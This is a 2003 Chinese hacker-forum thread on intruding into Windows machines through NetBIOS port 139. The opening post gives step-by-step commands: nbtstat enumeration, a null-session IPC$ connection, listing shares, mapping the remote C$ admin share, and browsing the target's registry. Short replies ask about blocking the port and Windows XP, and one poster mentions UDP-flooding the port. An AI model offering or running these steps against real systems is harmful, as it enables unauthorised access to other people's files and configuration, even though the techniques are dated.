以文本方式查看主题 -  堕落街论坛  (http://duoluojie.1314179.com.cn:443/index.asp) --  游戏体育  (http://duoluojie.1314179.com.cn:443/list.asp?boardid=331) ----  139端口入侵  (http://duoluojie.1314179.com.cn:443/dispbbs.asp?boardid=331&id=14597)

--  作者：维她命 --  发布时间：2003/12/17 16:16:00 --  139端口入侵 **事先声明，这是我摘超来方便自己学习的** 首先当然是扫一下网上开了139端口的机子了 其实139端口也就是NetBIOS session端口 进行 文件和打印共享的端口,你要先用NBTSTAT看一下NETBIOS的信息 命令方式 nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]开关： -a 列出给定主机名的远程计算机的名字表（name table） -A 列出给定IP地址的远程计算机的名字表 -c 列出远程名字缓冲区（name cache），包括IP地址 -n 列出本地NetBIOS 名字 -r 列出通过广播（broadcast）和WINS解析的名字 -R 清除和重新装入远程的缓冲的名字表 -S 列出和目标IP地址会话的表 -s 列出会话表转换 OK，我们在来看看共享 C:\\>net view \\\\[目标计算机的IP地址] 不过有可能会被拒绝在试试 C:\\>net use \\\\IP\\ipc$ "" /user:"" The command completed successfully. C:\\>net view \\\\IP Shared resources at \\\\IP Share name Type Used as Comment IPC成功建立后，服务器的共享资源列表才能访问到我们在看一下有没有可以用net命令进行连 接的。 c:\\>net use x: \\\\[ipaddr]\\[share] 万一不行的话我们就用上面的方法IPC$ 一旦IPC$共享顺利完成，我们就可以映射了 c:\\>net use g: \\\\IP\\c$ 得到了C$共享，并将该目录映射到g:，键入： c:\\>dir g: /p 就能显示这个目录的所有内容。 成功地进行了IPC$连接后，点击Start -> Run，键入regedit。选择Registry -> Connect Network Registry，再键入那台机器的IP地址。不一会，就能看目标计 算机的的Registry了。 呵呵，搞定了这个命令很有用呀 C:\\>net use \\\\0.0.0.0\\ipc$ 密码／ｕｓｅｒ：用户名 这个也可以 c:\\>net use g: \\\\IP\\c$

--  作者：思维中毒 --  发布时间：2003/12/17 16:27:00 --   天还有人问了如何屏蔽139端口呢，实例我也用过，不错

--  作者：维她命 --  发布时间：2003/12/17 16:30:00 --   呵呵.. 我就是想要告诉他人家是怎么样攻进去的啊..

--  作者：甘 --  发布时间：2003/12/24 12:08:00 --   试过对方是XP 的没？

--  作者：OnlyRice --  发布时间：2004/1/5 21:01:00 --   我只用 UDP Flood 攻击过这个端口。 我想入侵应该不是这么简单的事情，可能对 Win 9X 比较起作用。对NT系统来说？

--  作者：烈焰燃冰 --  发布时间：2004/1/5 22:04:00 --   进攻个人PC是不能说明什么的。会用工具的都行~